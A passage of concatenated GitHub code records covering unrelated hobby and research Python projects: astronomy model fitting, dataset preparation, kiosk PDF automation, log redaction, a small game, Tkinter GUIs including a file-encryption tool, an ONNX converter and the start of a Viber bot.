self._primary_eeps_arr\n\n def get_eep_fit(self, mass, age, feh, approx=False):\n eep_fn_pars = self.approx_eep_interp([feh, mass], \"all\")\n eep = eep_fn(age, *eep_fn_pars)\n if approx:\n return eep\n else:\n i, _ = searchsorted(self.primary_eeps_arr, eep)\n try:\n return polyval(self.eep_interps[i - 1]([feh, mass], \"all\"), age)\n except IndexError:\n if age > eep_fn_pars[-2]:\n return polyval(\n self.eep_interps[-1]([feh, mass], \"all\"), age\n ) # assume you're in last bit\n else:\n getLogger().warning(\n \"EEP conversion failed for mass={}, age={}, feh={} (approx eep = {}). Returning nan.\".format(\n mass, age, feh, eep\n )\n )\n return np.nan\n\n def view_eep_fit(self, mass, feh, plot_fit=True, order=5, p0=None, plot_p0=False):\n import holoviews as hv\n\n hv.extension(\"bokeh\")\n subdf = self.df.xs((mass, feh), level=(\"initial_mass\", \"initial_feh\"))\n\n ds = hv.Dataset(subdf)\n pts = hv.Points(ds, kdims=[\"age\", \"eep\"], vdims=[\"phase\", \"interpolated\"]).options(\n tools=[\"hover\"], width=800, height=400, marker=\"+\"\n )\n primary_eeps = self.primary_eeps\n primary_ages = [subdf.loc[e].age for e in primary_eeps if e < subdf.eep.max()]\n\n from isochrones.eep import eep_fn, eep_jac, eep_fn_p0\n from scipy.optimize import curve_fit\n\n if p0 is None:\n p0 = eep_fn_p0(subdf.age.values, subdf.eep.values, order=order)\n\n m = subdf.eep < 808\n if plot_fit:\n pfit, _ = curve_fit(\n partial(eep_fn, order=order),\n subdf.age.values[m],\n subdf.eep.values[m],\n p0,\n jac=partial(eep_jac, order=order),\n )\n fit = hv.Points([(a, eep_fn(a, *pfit)) for a in subdf.age])\n if plot_p0:\n p0_fit = hv.Points([(a, eep_fn(a, *p0)) for a in subdf.age])\n\n olay = pts * hv.Points([(a, e) for a, e in zip(primary_ages, primary_eeps)]).options(size=8)\n if plot_fit:\n olay = olay * fit\n if plot_p0:\n olay = olay * p0_fit\n return olay\n","repo_name":"timothydmorton/isochrones","sub_path":"isochrones/mist/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21060,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"34412904003","text":"import random\nimport gdown\nfrom zipfile import ZipFile\nfrom config import datasets_path\nimport os\nimport json\n\nallowed_chars = \"0123456789!@#$%^&*()-_+=\\\"':;[]{}/<>,.`~\\n\\\\\"\n\n\ndef download_wiki_datasets(file_path, output_folder):\n if not os.path.isfile(file_path):\n zip_file_path = os.path.join(output_folder, \"downloaded_file.zip\")\n gdown.download(id=file_path, output=zip_file_path, quiet=False)\n else:\n zip_file_path = file_path\n # Extract the contents of the ZIP file\n with ZipFile(zip_file_path, \"r\") as zip_ref:\n zip_ref.extractall(output_folder)\n # Delete the ZIP file\n datasets_file_path = os.path.join(output_folder, \"datasets.txt\")\n read_json_lines(output_folder, datasets_file_path)\n dataset_part_folder = os.path.join(output_folder, \"part\")\n if not os.path.isdir(dataset_part_folder):\n os.mkdir(dataset_part_folder)\n split_large_file(datasets_file_path, dataset_part_folder, chunk_size=50)\n txt_files = [\n f\n for f in os.listdir(dataset_part_folder)\n if f.endswith(\".txt\") and os.path.isfile(os.path.join(dataset_part_folder, f))\n ]\n return txt_files\n\n\ndef read_book(book):\n with open(book, \"r\", encoding=\"utf-8\") as f:\n return f.read()\n\n\ndef is_cjk(character):\n return any(\n [\n start <= ord(character) <= end\n for start, end in [\n (4352, 4607),\n (11904, 42191),\n (43072, 43135),\n (44032, 55215),\n (63744, 64255),\n (65072, 65103),\n (65381, 65500),\n (131072, 196607),\n ]\n ]\n )\n\n\ndef filter_data(data):\n print(\"Filtering data\")\n return \"\".join([char for char in data if char in allowed_chars or is_cjk(char)])\n\n\ndef load_book(book):\n print(f\"Loading book into ram\")\n return filter_data(str(read_book(book)))\n\n\ndef random_split_chunk(data, size=14, spliter=None):\n if spliter is not None:\n data = data.split(spliter)\n index = random.randrange(0, len(data))\n\n if spliter is not None:\n return spliter.join(data[index : index + size])\n else:\n return data[index : index + size]\n\n\ndef write_text_to_file(text, output_file):\n with open(output_file, \"a\", encoding=\"utf-8\") as file:\n if text.strip():\n file.write(text + \"\\n\")\n\n\ndef read_json_lines(folder_path, output_file):\n for root, dirs, files in os.walk(folder_path):\n for file_name in files:\n if \"wiki_\" in file_name:\n file_path = os.path.join(root, file_name)\n print(f\"Reading file: {file_path}\")\n\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\n for line in file:\n try:\n json_content = json.loads(line)\n if \"text\" in json_content:\n text_content = json_content[\"text\"]\n write_text_to_file(text_content, output_file)\n except json.JSONDecodeError as e:\n print(\n f\"Error decoding JSON in {file_path}, line: {line}\\nError: {e}\"\n )\n\n\ndef split_large_file(input_file, output_folder, chunk_size=50):\n chunk_size_mb = chunk_size * 1024 * 1024\n with open(input_file, \"rb\") as f:\n part_num = 1\n while True:\n chunk = f.read(chunk_size_mb)\n if not chunk:\n break\n\n output_file = os.path.join(output_folder, f\"part_{part_num}.txt\")\n with open(output_file, \"w\", encoding=\"utf-8\") as part_file:\n part_file.write(chunk.decode(\"utf-8\", errors=\".gitignore\"))\n\n part_num += 1\n\n\nif __name__ == \"__main__\":\n txt_files = download_wiki_datasets(\n \"/Users/quicksandzn/Downloads/wiki_zh_2019.zip\", datasets_path\n )\n","repo_name":"quicksandznzn/Bark-Voice-Clone","sub_path":"process/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43643964571","text":"# Ideia de como funciona o programa que atualiza os PDFs:\n# O programa ficaria rodando de fundo;\n# A pagina web ficaria aberta o tempo todo no moto tela cheia (f11 ativo);\n# Ai quando o computador visse que era um horario especifico ele rodaria todos as funções que no fim realizam a atualização os PDFs de horário e calendário.\n\n# Importações:\nimport time\nfrom datetime import datetime\nimport pyautogui\nimport os\n\n# a função a seguir é uma função que realiza um looping infinito, o looping repete a cada 1 segundo e verifica se a hora no computador é uma hora especifica se for a hora especificada é chamado algumas funções:\ndef verificaTempo():\n # faz um laço infinito:\n while True:\n time.sleep(1) # Espera 1 segundo\n tempo_atual = datetime.now() # pega a data atual inteira\n hora_atual = tempo_atual.hour # pega apenas a hora\n minuto_atual = tempo_atual.minute # pega apenas o minuto\n segundo_atual = tempo_atual.second # pega apenas o segundo\n # if que verifica o tempo especifico:\n if hora_atual == 2 and minuto_atual == 20 and segundo_atual == 8:\n baixaPDFs() # chama a função que baixa os novos PDFs\n apagaArquivos() # chama a função que apaga os PDFs antigos\n moveArquivos() # chama a função que move os PDFs novos para a pasta correta\n break\n verificaTempo() # chama a função de novo\n\n# a função a seguir faz uma automação do telcado e do mouse para baixar os PDFs no site da fatec:\ndef baixaPDFs():\n # obs.: a pagina web do totem estara em fullScreen\n\n pyautogui.press('f11') # tira o fullScreen\n\n site_fatec = 'fatecsaocaetano.edu.br/' # link do site da fatec\n\n pyautogui.hotkey('ctrl', 't') # abre uma nova guia\n pyautogui.hotkey('ctrl', 'l') # foca no campo de pesquisa de link do navegador\n pyautogui.write(site_fatec) # digita o link do site fatec\n pyautogui.press('enter') # aperta no enter\n\n baixaCalendario() # aqui chama a função que baixa o calendario\n baixaHorario() # aqui chama a função que baixa o horario\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', '9') # vai pra ultima guia do navegador\n pyautogui.hotkey('ctrl', 'w') # fecha guia\n pyautogui.hotkey('ctrl', '9') # vai pra ultima guia do navegador\n pyautogui.press('f11') # coloca o fullScreen\n\n# essa é a função que baixa o calendario:\ndef baixaCalendario():\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.click(x=710, y=430) # clica no botão do site da fatec que abre o drive que está o PDF do calendario\n\n time.sleep(2.5) # Espera 2.5 segundo\n\n pyautogui.click(x=1185, y=125) # clica no botão de baixar pdf\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', 'w') # fecha a guia que está, a guia do drive com o PDF do calendario\n\n# essa é a função que baixa o horario:\ndef baixaHorario():\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.click(x=910, y=430) # clica no botão do site da fatec que abre o drive que está o PDF do horario\n\n time.sleep(2.5) # Espera 2.5 segundo\n\n pyautogui.click(x=1185, y=125) # clica no botão de baixar pdf\n\n time.sleep(5) # Espera 5 segundo\n\n pyautogui.hotkey('ctrl', 'w') # fecha a guia que está, a guia do drive com o PDF do horario\n\n# aqui é a função que apaga os arquivos PDFs antigos:\ndef apagaArquivos():\n apagaHorario() # chama a função que apaga o arquivo do horario\n apagaCalendario() # chama a função que apaga o arquivo do calendario\n\n# função que realiza a remoção do arquivo PDF do horario:\ndef apagaHorario():\n pasta = 'PDFs' # nome da pasta\n arquivo = 'horario.pdf' # nome do arquivo\n caminho = os.path.join(pasta, arquivo) # aqui é o caminho relativo do arquivo\n\n # o if abaixo verifica se o arquivo existe e apaga ele:\n if os.path.exists(caminho):\n os.remove(caminho) # remove o arquivo\n\n# função que realiza a remoção do arquivo PDF do calendario:\ndef apagaCalendario():\n pasta = 'PDFs' # nome da pasta\n arquivo = 'calendario.pdf' # nome do arquivo\n caminho = os.path.join(pasta, arquivo) # aqui é o caminho relativo do arquivo\n\n # o if abaixo verifica se o arquivo existe e apaga ele:\n if os.path.exists(caminho):\n os.remove(caminho) # remove o arquivo\n\n# função que moves os arquivos para a pasta correta:\ndef moveArquivos():\n pasta = '/home/breno/Downloads/' # esse caminho da pasta onde os arquivos baixados estão salvos\n\n nomeHorario = 'horario' # nome relativo do arquivo PDF com o horario\n nomeCalendario = 'calendario' # nome relativo do arquivo PDF com o calendario\n\n # lista todos os arquivos da pasta:\n arquivos = [arquivo for arquivo in os.listdir(pasta) if os.path.isfile(os.path.join(pasta, arquivo))]\n\n # esse if abaixo passa por todos os nome dos arquivos:\n for arquivo in arquivos:\n # o if abaixo ve se o nome do arquivo contem a palavra horario:\n if nomeHorario in arquivo:\n moveHorario(pasta, arquivo, nomeHorario) # chama a função que move o arquivo do horario\n # o if abaixo ve se o nome do arquivo contem a palavra calendario:\n if nomeCalendario in arquivo:\n moveCalendario(pasta, arquivo, nomeCalendario) # chama a função que move o arquivo do calendario\n\n# função que move o horario:\ndef moveHorario(pasta, arquivo, nomeHorario):\n caminho_origem = os.path.join(pasta, arquivo) # caminho que está o arquivo baixado do horario\n caminho_destino = f'PDFs/{nomeHorario}.pdf' # caminho que o arquivo deverá ser colocado\n os.rename(caminho_origem, caminho_destino) # move o arquivo pra o local determinado\n\n# função que move o calendario:\ndef moveCalendario(pasta, arquivo, nomeCalendario):\n caminho_origem = os.path.join(pasta, arquivo) # caminho que está o arquivo baixado do calendario\n caminho_destino = f'PDFs/{nomeCalendario}.pdf' # caminho que o arquivo deverá ser colocado\n os.rename(caminho_origem, caminho_destino) # move o arquivo pra o local determinado\n\n# Aqui é um if de inicialização do arquivo Python:\nif __name__ == '__main__':\n verificaTempo()\n","repo_name":"BrenoCardoso2002/Totem-da-FATEC-SCS","sub_path":"Automacao/UpdatePdfs.py","file_name":"UpdatePdfs.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32523224817","text":"#!/usr/bin/env python3\n\"\"\" Obfuscate and return log message\n\"\"\"\nimport re\nfrom typing import List\nimport logging\n\n\nPII_FIELDS = ('name', 'email', 'phone', 'ssn', 'password')\n\n\nclass RedactingFormatter(logging.Formatter):\n \"\"\" Redacting Formatter class\n \"\"\"\n\n REDACTION = \"***\"\n FORMAT = \"[HOLBERTON] %(name)s %(levelname)s %(asctime)-15s: %(message)s\"\n SEPARATOR = \";\"\n\n def __init__(self, fields: List[str]):\n super(RedactingFormatter, self).__init__(self.FORMAT)\n self.fields = fields\n\n def format(self, record: logging.LogRecord) -> str:\n \"\"\" Filter values\n \"\"\"\n return filter_datum(\n self.fields,\n self.REDACTION, super().format(record), self.SEPARATOR)\n\n\ndef get_logger() -> logging.Logger:\n \"\"\"\n Implement a get_logger function that takes no arguments\n and returns a logging.Logger object.\n \"\"\"\n logger = logging.getLogger('user_data')\n logger.setLevel(logging.INFO)\n logger.propagate = False\n # Create console handler (ch) set level info\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n # streamhandler with redacting formatter\n ch.setFormatter(RedactingFormatter)\n # add handler to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef filter_datum(fields: List[str],\n redaction: str, message: str, separator: str) -> str:\n \"\"\" replace occurrences of certain field\n the log message passed in will be replaced\n with xxx\n \"\"\"\n for field in fields:\n message = re.sub(field + '=' + '.+?' + separator,\n field + '=' + redaction + separator,\n message)\n return(message)\n","repo_name":"MontyWilliams/holbertonschool-web_back_end","sub_path":"0x02-personal_data/filtered_logger.py","file_name":"filtered_logger.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42876012615","text":"def login_disponivel(l):\n not_over = True\n name = l[1]\n if l[1] in l[2]:\n name = l[1]\n return name\n else:\n i = 1\n while not_over:\n if name+i in l[2] :\n not_over = False\n else:\n i+1\n return name+i","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_270/ch168_2020_06_20_21_18_11_051321.py","file_name":"ch168_2020_06_20_21_18_11_051321.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21926499659","text":"# Narwhal Globals file\nimport umachine as pok\nimport urandom as rand\nimport sprites\nimport sounds\n\nnarwhal_sprites = sprites.narwhal_sprites\nenemies_sprites = sprites.enemies_sprites\ncharge_jar = sprites.charge_jar\n\n\nindex = 0\nposition = 1 #0 up, 1 middle, 2 down\ntime = 0\nspeed = 2#speed of the obstacles\nmult = 1 #number of obstacles\ncurrent = 0 #current obstacles\n\ncx = 0\ncy = 0\ncind = {}\ny = 35\nx = 4\nscore = 0\ncharge = 0\ndashing = False\nbest = 0\nboost = 2\nboost_time = 0\nquit = False\ntitle = True\n\nseaGunkPart = []\nfor i in range(0, 30):\n gunk = {\"x\": 110, \"y\": rand.getrandbits(7)}\n seaGunkPart.append(gunk)\n \ndef initNarwhal():\n \n global seaGunkPart, quit, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n index = 0\n \n #0 up, 1 middle, 2 down\n time = 0\n speed = 2#speed of the obstacles\n mult = 1 #number of obstacles\n current = 0 #current obstacles\n cx = 0\n cy = 0\n cind = {}\n y = 35\n x = 4\n score = 0\n charge = 0\n dashing = False\n boost = 2\n boost_time = 0\n quit = False\n \ndef drawTitle(screen, upg, eventtype):\n global quit, title, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n \n pok.draw_text(3, 2, \"Explore the ocean depths!\",6)\n pok.draw_text(3, 3, \"Explore the ocean depths!\",3)\n \n pok.draw_text(20, 70, \"Best:\\n \"+str(best),6)\n pok.draw_text(20, 71, \"Best:\\n \"+str(best),3)\n \n if time <= 5:\n index = 0\n if time <= 10 and time > 5:\n index = 1\n if time <= 15 and time > 10:\n index = 2\n if time <= 20 and time > 15:\n index = 1\n \n if time > 20:\n time = 0\n screen.blit(narwhal_sprites[index], 45,25)\n \n screen.blit(enemies_sprites[0], 2,38)\n screen.blit(enemies_sprites[1], 90,38)\n \n \n if eventtype != upg.NOEVENT:\n if eventtype.type == upg.KEYDOWN:\n if eventtype.key == upg.BUT_B:\n quit = True\n title = False\n gameover = False\n else:\n title = False\n gameover = False\n initNarwhal()\n \ndef drawGameOver(screen, upg, eventtype):\n global title, gameover, cind, best, quit\n pok.draw_text(3, 2, \"Game over...\",6)\n pok.draw_text(3, 3, \"Game over...\",3)\n \n pok.draw_text(3, 12, \"Best:\\n \"+str(best),6)\n pok.draw_text(3, 13, \"Best:\\n \"+str(best),3)\n screen.blit(cind[\"spr\"], 45, 24)\n if eventtype != upg.NOEVENT:\n if eventtype.type == upg.KEYDOWN:\n if eventtype.key == upg.BUT_B:\n quit = True\n title = True\n gameover = False\n else:\n title = True\n gameover = False\n initNarwhal()\n \ndef drawMain(screen, upg, eventtype, audio):\n global title, gameover, boost, boost_time, index, position, time, speed, mult, current, cx, cy, cind, x, y, score, charge, dashing, best\n boost_time+=1\n score = score+ 1*mult\n speed = boost*mult\n \n if boost_time > 500:\n boost += 1\n boost_time = 0\n \n if eventtype != upg.NOEVENT:\n if eventtype.type== upg.KEYDOWN:\n if eventtype.key == upg.K_UP:\n position = 0\n audio.play_sfx(sounds.low, len(sounds.low), True)\n if eventtype.key == upg.K_DOWN:\n position = 2\n audio.play_sfx(sounds.low, len(sounds.low), True)\n if eventtype.key == upg.K_RIGHT or eventtype.key == upg.BUT_A:\n if charge > 0 and not dashing:\n dashing = True\n if eventtype.key == upg.K_LEFT or eventtype.key == upg.BUT_B:\n mult = -2\n if eventtype.type == upg.KEYUP:\n if eventtype.key == upg.K_UP:\n position = 1\n if eventtype.key == upg.K_DOWN:\n position = 1\n if eventtype.key == upg.K_RIGHT or eventtype.key == upg.BUT_A:\n dashing = False\n if eventtype.key == upg.K_LEFT or eventtype.key == upg.BUT_B:\n mult = 1\n\n if position is 0:\n y = 5\n if position is 1:\n y = 35\n if position is 2:\n y = 65\n \n if time <= 5:\n index = 0\n if time <= 10 and time > 5:\n index = 1\n if time <= 15 and time > 10:\n index = 2\n if time <= 20 and time > 15:\n index = 1\n \n #Dashing\n if dashing and charge > 0:\n if charge - 5 <= 0:\n charge = 0\n dashing = False\n else:\n audio.play_sfx(sounds.mid, len(sounds.mid), True)\n charge -= 5\n mult = 2\n x = 19\n index = 3\n if not dashing:\n x = 4\n mult = 1\n \n if time > 20:\n time = 0\n if charge < 100 and not dashing:\n if charge + 25 > 100:\n charge = 100\n else:\n charge += 25\n screen.blit(narwhal_sprites[index], x, y) \n \n #enemies\n if current == 0:\n current += 1\n spr = rand.getrandbits(3)\n y = 0\n if spr < 2:\n y = 38\n if spr == 7:\n y = 32\n cind = {\"id\": spr, \"spr\": enemies_sprites[spr], \"x\": 110, \"y\": y}\n else:\n \n cind[\"x\"]-=speed\n if cind[\"x\"] < -16:\n current = 0\n \n if cind[\"id\"] < 7:\n if collide(x,y,cind[\"x\"], cind[\"y\"]):\n if cind[\"id\"] > 3 and dashing:\n print(\"Close call\") \n else:\n audio.play_sfx(sounds.lost, len(sounds.lost), True)\n gameover = True\n if score > best:\n best = score\n else:\n if collide2(x,y,cind[\"x\"],cind[\"y\"]):\n gameover = True\n if score > best:\n best = score\n \n screen.blit(cind[\"spr\"], cind[\"x\"], cind[\"y\"])\n pok.draw_text(3, 3, \"Distance: \"+str(score), 6) \n pok.draw_text(2, 2, \"Distance: \"+str(score), 3) \n \n for x in seaGunkPart:\n screen.blit(sprites.seaGunk, x[\"x\"], x[\"y\"])\n x[\"x\"] = x[\"x\"] - rand.getrandbits(3)\n if x[\"x\"] < 0:\n x[\"x\"]=110\n x[\"y\"] = rand.getrandbits(7)\n \n #charge draw\n screen.fill(7, upg.Rect(3,83,charge,3)) \n screen.blit(charge_jar, 2, 82)\n\n#collide with sea junk or shark\ndef collide(rx, ry, ax, ay):\n if ((rx < ax + 16) and (rx + 24 > ax) and (ry < ay + 50) and (ry + 18 > ay)):\n return True\n else:\n return False\n \ndef collide2(rx, ry, ax, ay):\n if ((rx < ax + 30) and (rx + 24 > ax) and (ry < ay + 16) and (ry + 18 > ay)):\n return True\n else:\n return False\n########################### ","repo_name":"Torbuntu/TorsGameGallery","sub_path":"narwhalGlobals.py","file_name":"narwhalGlobals.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25483010705","text":"from tkinter import *\n\n# 윈도우 창 부분 인스턴스\nwindow = Tk()\n\n# 메뉴 부분 구성, mainMenu : 상위 메뉴\nmainMenu = Menu(window)\n# 메인 메뉴의 부모 창 -> window\nwindow.config(menu=mainMenu)\n# 파일 메뉴의 부모 창 -> 메인메뉴\nfileMenu = Menu(mainMenu)\nfileMenu2 = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"파일\", menu=fileMenu)\nmainMenu.add_cascade(label=\"파일2\", menu=fileMenu2)\n\n# 부모 메뉴 : 파일 1\nfileMenu.add_command(label=\"열기\")\nfileMenu.add_separator()\nfileMenu.add_command(label=\"종료\")\n\n# 부모 메뉴 : 파일 2\nfileMenu2.add_command(label=\"열기\")\nfileMenu2.add_separator()\nfileMenu2.add_command(label=\"종료\")\n\nwindow.mainloop()\n","repo_name":"hanga185/PyTest","sub_path":"PyTest230817-main/8.21/bookcode5/Code05-11.py","file_name":"Code05-11.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27158361531","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpBatchNormalization(Op):\n\n def __init__(self, node, *args):\n super().__init__(node, *args)\n\n def to_function(self, env, constants):\n [x, gamma, beta, mean, var] = self.node.input\n if gamma not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing gamma')\n if beta not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing beta')\n if mean not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing mean')\n if var not in constants:\n raise UnsupportedONNXOperation(self.node, 'missing var')\n eps = 1e-05\n for attr in self.node.attribute:\n if attr.name == 'epsilon':\n eps = attr.f\n return [\n BatchNormalization(\n [x],\n list(self.node.output),\n eps=eps,\n avg_mean=constants[mean],\n avg_var=constants[var],\n gamma=constants[gamma],\n beta=constants[beta],\n )\n ]\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/batch_normalization.py","file_name":"batch_normalization.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"43078330119","text":"import Tkinter,sys\r\nfrom Tkinter import *\r\nimport tkFileDialog\r\nimport os\r\nfrom splifile import FileSplitter, FileSplitterException, mainp\r\nfrom encryptdir import encrypt_file, decrypt_file, renamefiles, main\r\n\r\n\r\n\r\ndef proceed():\r\n\t\tn=Tkinter.Tk()\r\n\t\tdef server():\r\n\t\t\t#global n\r\n\t\t\tpth=n.directory\r\n\t\t\tkeyw=pwd.get()\r\n\t\t\tdef splitter0():\r\n\t\t\t\tos.chdir(pth)\r\n\t\t\t\tn1=numc.get()\r\n\t\t\t\tn2=int(n1)\r\n\t\t\t\ta=0\r\n\t\t\t\tdirs=os.listdir(pth)\r\n\t\t\t\tfor fn in dirs:\r\n\t\t\t\t\tprint(fn)\r\n\t\t\t\t\tmainp(fn,n2,a)\r\n\t\t\tdef encrypter0():\r\n\t\t\t\ta=0\r\n\t\t\t\tmain(keyw,pth,a)\r\n\t\t\tif __name__==\"__main__\" :\r\n\t\t\t\tsplitter0()\r\n\t\t\t\tencrypter0()\r\n\t\t\r\n\t\tdef client():\r\n\t\t\t#global n\r\n\t\t\tpth=n.directory\r\n\t\t\tkeyw=pwd.get()\r\n\t\t\tdef splitter1():\r\n\t\t\t\tos.chdir(pth)\r\n\t\t\t\tn1=numc.get()\r\n\t\t\t\tn2=int(n1)\r\n\t\t\t\ta=1\r\n\t\t\t\tdirs=os.listdir(pth)\r\n\t\t\t\tfor fn in dirs:\r\n\t\t\t\t\tprint(fn)\r\n\t\t\t\t\tmainp(fn,n2,a)\r\n\t\t\tdef encrypter1():\r\n\t\t\t\ta=1\r\n\t\t\t\tmain(keyw,pth,a)\r\n\t\t\tif __name__==\"__main__\" :\r\n\t\t\t\tencrypter1()\r\n\t\t\t\tsplitter1()\r\n\t\r\n\t\ttitl=Label(n, text='\t\t\tParCrypt\t\t').grid(row=0)\r\n\t\tl9=Label(n, text='').grid(row=1)\r\n\t\tl8=Label(n, text='Key : ').grid(row=2,column=0)\r\n\t\tpwd=Entry(n)\r\n\t\tpwd.grid(row=2, column=1)\r\n\t\tn.directory=tkFileDialog.askdirectory()\r\n\t\tb1=Button(n, text =\"Encrypt\", command=server)\r\n\t\tb1.grid(row=5,column=0)\r\n\t\tb2=Button(n, text =\"Decrypt\", command = client)\r\n\t\tb2.grid(row=5,column=1)\r\n\t\tl6=Label(n, text='Chunks : ').grid(row=3, column=0)\r\n\t\tnumc=Entry(n)\r\n\t\tnumc.grid(row=3,column=1)\r\n\t\tl7=Label(n, text='').grid(row=4)\r\n\r\n\r\n\r\ndef diffiehellman():\r\n\tglobal m\r\n\tp=23\r\n\tG=18\r\n\ta1=puk.get()\r\n\tb1=prk.get()\r\n\ta=int(a1)\r\n\tb=int(b1)\r\n\tA=(a**b)%p\r\n\tif(A==G):\r\n\t\tx=Label(m, text=\"Authenticated\").grid(row=6)\r\n\t\tproceed()\r\n\telse:\r\n\t\tx=Label(m, text=\"Authentication Failed\").grid(row=6)\r\n\t\tm.quit()\r\n\r\nm=Tkinter.Tk()\r\nt=Label(m, text='\t\t\tParCrypt\t\t').grid(row=0)\r\nl=Label(m, text='').grid(row=1)\r\nh1=Label(m, text='Public Key : ').grid(row=2)\r\nh2=Label(m, text='Private Key : ').grid(row=3)\r\npuk=Entry(m)\r\npuk.grid(row=2, column=1)\r\nprk=Entry(m)\r\nprk.grid(row=3, column=1)\r\nB=Button(m, text =\"Verify\", command = diffiehellman)\r\nB.grid(row=5)\r\nm.mainloop()\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Aviral18/ParCrypt","sub_path":"mainrun.py","file_name":"mainrun.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74888174133","text":"from viberbot.api.viber_requests import ViberUnsubscribedRequest\r\n\r\nfrom flask import Flask, request, Response\r\nfrom viberbot import Api\r\nfrom viberbot.api.bot_configuration import BotConfiguration\r\nfrom viberbot.api.messages.text_message import TextMessage\r\nfrom viberbot.api.messages.keyboard_message import KeyboardMessage\r\nfrom viberbot.api.viber_requests import ViberFailedRequest, ViberConversationStartedRequest\r\nfrom viberbot.api.viber_requests import ViberMessageRequest\r\nfrom viberbot.api.viber_requests import ViberSubscribedRequest\r\n\r\nimport os\r\nimport random\r\nimport time\r\nimport logging\r\nimport sched\r\nimport threading\r\nimport pymysql\r\n\r\nPAYMENT = dict()\r\nPAYMENT['transaction_id'] = 0\r\nPAYMENT['transaction_type'] = 'defrayal'\r\nPAYMENT['transaction_amount'] = 0\r\n# Словарь сессии\r\nSESSION = dict()\r\nSESSION['is_auth'] = False\r\nSESSION['client_id'] = '000000000'\r\nSESSION['client_contract'] = '00/00/00'\r\nSESSION['client_compani'] = '0'\r\nSESSION['client_debt'] = 0\r\nSESSION['client_tariff'] = 0\r\nSESSION['client_recommended_payment'] = SESSION['client_debt'] + SESSION['client_tariff']\r\nSESSION['client_for_year_payment'] = SESSION['client_tariff'] * 0.9\r\n\r\noperators = []\r\noperator = {'chat_id': None, 'name': None, 'work': None}\r\n\r\nsmm = []\r\n\r\npassword = None\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nhandler = logging.StreamHandler()\r\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nhandler.setFormatter(formatter)\r\n\r\nlogger.addHandler(handler)\r\n\r\nkeyboard = \\\r\n {\r\n \"DefaultHeight\": True,\r\n \"BgColor\": \"#c3c3c3\",\r\n \"Type\": \"keyboard\",\r\n \"Buttons\": [\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Увійти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Увійти\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Графік роботи\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Графік роботи\",\r\n \"ReplyType\": \"message\"\r\n },\r\n\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Соц мережі\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Соц мережі\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Контакти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Контакти\",\r\n \"ReplyType\": \"message\"\r\n }\r\n ]\r\n }\r\n\r\nsmm_keyboard = \\\r\n {\r\n \"DefaultHeight\": True,\r\n \"BgColor\": \"#c3c3c3\",\r\n \"Type\": \"keyboard\",\r\n \"Buttons\": [\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Стан рахунку\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Стан рахунку\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Перейти до оплати\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": 